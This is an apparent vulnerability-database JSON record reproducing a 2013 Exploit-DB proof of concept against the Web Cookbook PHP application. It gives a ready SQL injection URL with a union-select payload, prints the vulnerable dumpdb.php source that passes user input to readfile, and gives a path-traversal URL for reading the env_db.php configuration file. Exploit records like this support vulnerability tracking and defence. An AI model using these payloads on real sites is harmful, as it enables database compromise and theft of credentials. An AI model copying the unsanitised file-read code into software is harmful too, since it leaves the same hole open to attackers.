DATABASE RESOURCES PRICING ABOUT US

{"id": "EDB-ID:24531", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Web Cookbook - Multiple Vulnerabilities", "description": "", "published": "2013-02-21T00:00:00", "modified": "2013-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/24531", "reporter": "cr4wl3r", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:49:37", "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "_state": {"dependencies": 1661190352, "score": 1661184847, "epss": 1678800746}, "_internal": {"score_hash": "9d207695d57d7376b285d1639ba3eaa8"}, "sourceHref": "https://www.exploit-db.com/download/24531", "sourceData": "# Web Cookbook Multiple Vulnerability\r\n# By cr4wl3r http://bastardlabs.info\r\n# Script: http://sourceforge.net/projects/webcookbook/\r\n# Tested: Win 7\r\n\r\n# Proof of Concept\r\n# SQL Injection\r\n\r\nhttp://bastardlabs/[path]/rezeptanzeige.php?currid=[SQLi]\r\nhttp://bastardlabs/[path]/rezeptanzeige.php?currid=-9999%20union%20select%201,version(),3,4,5,6,7,8,9,10--\r\n\r\n# Remote File Disclosure\r\n# Bugs found /admin/dumpdb.php\r\n\r\n--------------------------\r\n1 <?php\r\n2 $outfile = $_GET['outfile'];\r\n3 header(\"Content-Type: text/plain\");\r\n4 header(\"Content-length: \" . filesize(\"../upload/\" . $outfile));\r\n5 header(\"Content-Disposition: attachment; filename=\" . $outfile);\r\n6 readfile(\"../upload/\" . $outfile);\r\n7 ?>\r\n--------------------------\r\n\r\nhttp://bastardlabs/[path]/admin/dumpdb.php?outfile=../[file]\r\nhttp://bastardlabs/[path]/admin/dumpdb.php?outfile=../env_db.php\r\n\r\n# Demo:\r\nhttp://bastardlabs.info/demo/WebCookbook1.png\r\nhttp://bastardlabs.info/demo/WebCookbook2.png", "osvdbidlist": ["90552", "90551"], "exploitType": "webapps", "verified": true}

{}